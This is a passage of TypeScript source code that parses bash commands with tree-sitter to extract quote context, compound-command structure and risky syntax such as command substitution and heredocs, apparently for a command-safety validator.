/** Command text with all quoted content removed */
fullyUnquoted: string
/** Like fullyUnquoted but preserves quote characters (', ") */
unquotedKeepQuoteChars: string
}
export type CompoundStructure = {
/** Whether the command has compound operators (&&, ||, ;) at the top level */
hasCompoundOperators: boolean
/** Whether the command has pipelines */
hasPipeline: boolean
/** Whether the command has subshells */
hasSubshell: boolean
/** Whether the command has command groups ({...}) */
hasCommandGroup: boolean
/** Top-level compound operator types found */
operators: string[]
/** Individual command segments split by compound operators */
segments: string[]
}
export type DangerousPatterns = {
/** Has $() or backtick command substitution (outside quotes that would make it safe) */
hasCommandSubstitution: boolean
/** Has <() or >() process substitution */
hasProcessSubstitution: boolean
/** Has ${...} parameter expansion */
hasParameterExpansion: boolean
/** Has heredoc */
hasHeredoc: boolean
/** Has comment */
hasComment: boolean
}
export type TreeSitterAnalysis = {
quoteContext: QuoteContext
compoundStructure: CompoundStructure
/** Whether actual operator nodes (;, &&, ||) exist — if false, \; is just a word argument */
hasActualOperatorNodes: boolean
dangerousPatterns: DangerousPatterns
}
type QuoteSpans = {
raw: Array<[number, number]> // raw_string (single-quoted)
ansiC: Array<[number, number]> // ansi_c_string ($'...')
double: Array<[number, number]> // string (double-quoted)
heredoc: Array<[number, number]> // quoted heredoc_redirect
}
/**
* Single-pass collection of all quote-related spans.
* Previously this was 5 separate tree walks (one per type-set plus
* allQuoteTypes plus heredoc); fusing cuts tree-traversal ~5x.
*
* Replicates the per-type walk semantics: each original walk stopped at
* its own type. So the raw_string walk would recurse THROUGH a string
* node (not its type) to reach nested raw_string inside $(...), but the
* string walk would stop at the outer string. We track `inDouble` to
* collect the *outermost* string span per path, while still descending
* into $()/${} bodies to pick up inner raw_string/ansi_c_string.
*
* raw_string / ansi_c_string / quoted-heredoc bodies are literal text
* in bash (no expansion), so no nested quote nodes exist — return early.
*/
function collectQuoteSpans(
node: TreeSitterNode,
out: QuoteSpans,
inDouble: boolean,
): void {
switch (node.type) {
case 'raw_string':
out.raw.push([node.startIndex, node.endIndex])
return // literal body, no nested quotes possible
case 'ansi_c_string':
out.ansiC.push([node.startIndex, node.endIndex])
return // literal body
case 'string':
// Only collect the outermost string (matches old per-type walk
// which stops at first match). Recurse regardless — a nested
// $(cmd 'x') inside "..." has a real inner raw_string.
if (!inDouble) out.double.push([node.startIndex, node.endIndex])
for (const child of node.children) {
if (child) collectQuoteSpans(child, out, true)
}
return
case 'heredoc_redirect': {
// Quoted heredocs (<<'EOF', <<"EOF", <<\EOF): literal body.
// Unquoted (<<EOF) expands $()/${} — the body can contain
// $(cmd 'x') whose inner '...' IS a real raw_string node.
// Detection: heredoc_start text starts with '/"/\\
// Matches sync path's extractHeredocs({ quotedOnly: true }).
let isQuoted = false
for (const child of node.children) {
if (child && child.type === 'heredoc_start') {
const first = child.text[0]
isQuoted = first === "'" || first === '"' || first === '\\'
break
}
}
if (isQuoted) {
out.heredoc.push([node.startIndex, node.endIndex])
return // literal body, no nested quote nodes
}
// Unquoted: recurse into heredoc_body → command_substitution →
// inner quote nodes. The original per-type walks did NOT stop at
// heredoc_redirect (not in their type sets), so they recursed here.
break
}
}
for (const child of node.children) {
if (child) collectQuoteSpans(child, out, inDouble)
}
}
/**
* Builds a Set of all character positions covered by the given spans.
*/
function buildPositionSet(spans: Array<[number, number]>): Set<number> {
const set = new Set<number>()
for (const [start, end] of spans) {
for (let i = start; i < end; i++) {
set.add(i)
}
}
return set
}
/**
* Drops spans that are fully contained within another span, keeping only the
* outermost. Nested quotes (e.g., `"$(echo 'hi')"`) yield overlapping spans
* — the inner raw_string is found by recursing into the outer string node.
* Processing overlapping spans corrupts indices since removing/replacing the
* outer span shifts the inner span's start/end into stale positions.
*/
function dropContainedSpans<T extends readonly [number, number, ...unknown[]]>(
spans: T[],
): T[] {
return spans.filter(
(s, i) =>
!spans.some(
(other, j) =>
j !== i &&
other[0] <= s[0] &&
other[1] >= s[1] &&
(other[0] < s[0] || other[1] > s[1]),
),
)
}
/**
* Removes spans from a string, returning the string with those character
* ranges removed.
*/
function removeSpans(command: string, spans: Array<[number, number]>): string {
if (spans.length === 0) return command
// Drop inner spans that are fully contained in an outer one, then sort by
// start index descending so we can splice without offset shifts.
const sorted = dropContainedSpans(spans).sort((a, b) => b[0] - a[0])
let result = command
for (const [start, end] of sorted) {
result = result.slice(0, start) + result.slice(end)
}
return result
}
/**
* Replaces spans with just the quote delimiters (preserving ' and " characters).
*/
function replaceSpansKeepQuotes(
command: string,
spans: Array<[number, number, string, string]>,
): string {
if (spans.length === 0) return command
const sorted = dropContainedSpans(spans).sort((a, b) => b[0] - a[0])
let result = command
for (const [start, end, open, close] of sorted) {
// Replace content but keep the quote delimiters
result = result.slice(0, start) + open + close + result.slice(end)
}
return result
}
/**
* Extract quote context from the tree-sitter AST.
* Replaces the manual character-by-character extractQuotedContent() function.
*
* Tree-sitter node types:
* - raw_string: single-quoted ('...')
* - string: double-quoted ("...")
* - ansi_c_string: ANSI-C quoting ($'...') — span includes the leading $
* - heredoc_redirect: QUOTED heredocs only (<<'EOF', <<"EOF", <<\EOF) —
* the full redirect span (<<, delimiters, body, newlines) is stripped
* since the body is literal text in bash (no expansion). UNQUOTED
* heredocs (<<EOF) are left in place since bash expands $(...)/${...}
* inside them, and validators need to see those patterns. Matches the
* sync path's extractHeredocs({ quotedOnly: true }).
*/
export function extractQuoteContext(
rootNode: unknown,
command: string,
): QuoteContext {
// Single walk collects all quote span types at once.
const spans: QuoteSpans = { raw: [], ansiC: [], double: [], heredoc: [] }
collectQuoteSpans(rootNode as TreeSitterNode, spans, false)
const singleQuoteSpans = spans.raw
const ansiCSpans = spans.ansiC
const doubleQuoteSpans = spans.double
const quotedHeredocSpans = spans.heredoc
const allQuoteSpans = [
...singleQuoteSpans,
...ansiCSpans,
...doubleQuoteSpans,
...quotedHeredocSpans,
]
// Build a set of positions that should be excluded for each output variant.
// For withDoubleQuotes: remove single-quoted spans entirely, plus the
// opening/closing `"` delimiters of double-quoted spans (but keep the
// content between them). This matches the regex extractQuotedContent()
// semantics where `"` toggles quote state but content is still emitted.
const singleQuoteSet = buildPositionSet([
...singleQuoteSpans,
...ansiCSpans,
...quotedHeredocSpans,
])
const doubleQuoteDelimSet = new Set<number>()
for (const [start, end] of doubleQuoteSpans) {
doubleQuoteDelimSet.add(start) // opening "
doubleQuoteDelimSet.add(end - 1) // closing "
}
let withDoubleQuotes = ''
for (let i = 0; i < command.length; i++) {
if (singleQuoteSet.has(i)) continue
if (doubleQuoteDelimSet.has(i)) continue
withDoubleQuotes += command[i]
}
// fullyUnquoted: remove all quoted content
const fullyUnquoted = removeSpans(command, allQuoteSpans)
// unquotedKeepQuoteChars: remove content but keep delimiter chars
const spansWithQuoteChars: Array<[number, number, string, string]> = []
for (const [start, end] of singleQuoteSpans) {
spansWithQuoteChars.push([start, end, "'", "'"])
}
for (const [start, end] of ansiCSpans) {
// ansi_c_string spans include the leading $; preserve it so this
// matches the regex path, which treats $ as unquoted preceding '.
spansWithQuoteChars.push([start, end, "$'", "'"])
}
for (const [start, end] of doubleQuoteSpans) {
spansWithQuoteChars.push([start, end, '"', '"'])
}
for (const [start, end] of quotedHeredocSpans) {
// Heredoc redirect spans have no inline quote delimiters — strip entirely.
spansWithQuoteChars.push([start, end, '', ''])
}
const unquotedKeepQuoteChars = replaceSpansKeepQuotes(
command,
spansWithQuoteChars,
)
return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }
}
/**
* Extract compound command structure from the AST.
* Replaces isUnsafeCompoundCommand() and splitCommand() for tree-sitter path.
*/
export function extractCompoundStructure(
rootNode: unknown,
command: string,
): CompoundStructure {
const n = rootNode as TreeSitterNode
const operators: string[] = []
const segments: string[] = []
let hasSubshell = false
let hasCommandGroup = false
let hasPipeline = false
// Walk top-level children of the program node
function walkTopLevel(node: TreeSitterNode): void {
for (const child of node.children) {
if (!child) continue
if (child.type === 'list') {
// list nodes contain && and || operators
for (const listChild of child.children) {
if (!listChild) continue
if (listChild.type === '&&' || listChild.type === '||') {
operators.push(listChild.type)
} else if (
listChild.type === 'list' ||
listChild.type === 'redirected_statement'
) {
// Nested list, or redirected_statement wrapping a list/pipeline —
// recurse so inner operators/pipelines are detected. For
// `cmd1 && cmd2 2>/dev/null && cmd3`, the redirected_statement
// wraps `list(cmd1 && cmd2)` — the inner `&&` would be missed
// without recursion.
walkTopLevel({ ...node, children: [listChild] } as TreeSitterNode)
} else if (listChild.type === 'pipeline') {
hasPipeline = true
segments.push(listChild.text)
} else if (listChild.type === 'subshell') {
hasSubshell = true
segments.push(listChild.text)
} else if (listChild.type === 'compound_statement') {
hasCommandGroup = true
segments.push(listChild.text)
} else {
segments.push(listChild.text)
}
}
} else if (child.type === ';') {
operators.push(';')
} else if (child.type === 'pipeline') {
hasPipeline = true
segments.push(child.text)
} else if (child.type === 'subshell') {
hasSubshell = true
segments.push(child.text)
} else if (child.type === 'compound_statement') {
hasCommandGroup = true
segments.push(child.text)
} else if (
child.type === 'command' ||
child.type === 'declaration_command' ||
child.type === 'variable_assignment'
) {
segments.push(child.text)
} else if (child.type === 'redirected_statement') {
// `cd ~/src && find path 2>/dev/null` — tree-sitter wraps the ENTIRE
// compound in a redirected_statement: program → redirected_statement →
// (list → cmd1, &&, cmd2) + file_redirect. Same for `cmd1 | cmd2 > out`
// (wraps pipeline) and `(cmd) > out` (wraps subshell). Recurse to
// detect the inner structure; skip file_redirect children (redirects
// don't affect compound/pipeline classification).
let foundInner = false
for (const inner of child.children) {
if (!inner || inner.type === 'file_redirect') continue
foundInner = true
walkTopLevel({ ...child, children: [inner] } as TreeSitterNode)
}
if (!foundInner) {
// Standalone redirect with no body (shouldn't happen, but fail-safe)
segments.push(child.text)
}
} else if (child.type === 'negated_command') {
// `! cmd` — recurse into the inner command so its structure is
// classified (pipeline/subshell/etc.), but also record the full
// negated text as a segment so segments.length stays meaningful.
segments.push(child.text)
walkTopLevel(child)
} else if (
child.type === 'if_statement' ||
child.type === 'while_statement' ||
child.type === 'for_statement' ||
child.type === 'case_statement' ||
child.type === 'function_definition'
) {
// Control-flow constructs: the construct itself is one segment,
// but recurse so inner pipelines/subshells/operators are detected.
segments.push(child.text)
walkTopLevel(child)
}
}
}
walkTopLevel(n)
// If no segments found, the whole command is one segment
if (segments.length === 0) {
segments.push(command)
}
return {
hasCompoundOperators: operators.length > 0,
hasPipeline,
hasSubshell,
hasCommandGroup,
operators,
segments,
}
}
/**
* Check whether the AST contains actual operator nodes (;, &&, ||).
*
* This is the key function for eliminating the `find -exec \;` false positive.
* Tree-sitter parses `\;` as part of a `word` node (an argument to find),
* NOT as a `;` operator. So if no actual `;` operator nodes exist in the AST,
* there are no compound operators and hasBackslashEscapedOperator() can be skipped.
*/
export function hasActualOperatorNodes(rootNode: unknown): boolean {
const n = rootNode as TreeSitterNode
function walk(node: TreeSitterNode): boolean {
// Check for operator types that indicate compound commands
if (node.type === ';' || node.type === '&&' || node.type === '||') {
// Verify this is a child of a list or program, not inside a command
return true
}
if (node.type === 'list') {
// A list node means there are compound operators
return true
}
for (const child of node.children) {
if (child && walk(child)) return true
}
return false
}
return walk(n)
}
/**
* Extract dangerous pattern information from the AST.
*/
export function extractDangerousPatterns(rootNode: unknown): DangerousPatterns {
const n = rootNode as TreeSitterNode
let hasCommandSubstitution = false
let hasProcessSubstitution = false
let hasParameterExpansion = false
let hasHeredoc = false
let hasComment = false
function walk(node: TreeSitterNode): void {
switch (node.type) {
case 'command_substitution':
hasCommandSubstitution = true
break
case 'process_substitution':
hasProcessSubstitution = true
break
case 'expansion':
hasParameterExpansion = true
break
case 'heredoc_redirect':
hasHeredoc = true
break
case 'comment':
hasComment = true
break
}
for (const child of node.children) {
if (child) walk(child)
}
}
walk(n)
return {
hasCommandSubstitution,
hasProcessSubstitution,
hasParameterExpansion,
hasHeredoc,
hasComment,
}
}
/**
* Perform complete tree-sitter analysis of a command.
* Extracts all security-relevant data from the AST in one pass.
* This data must be extracted before tree.delete() is called.
*/
export function analyzeCommand(
rootNode: unknown,
command: string,
): TreeSitterAnalysis {
return {
quoteContext: extractQuoteContext(rootNode, command),
compoundStructure: extractCompoundStructure(rootNode, command),
hasActualOperatorNodes: hasActualOperatorNodes(rootNode),
dangerousPatterns: extractDangerousPatterns(rootNode),
}
}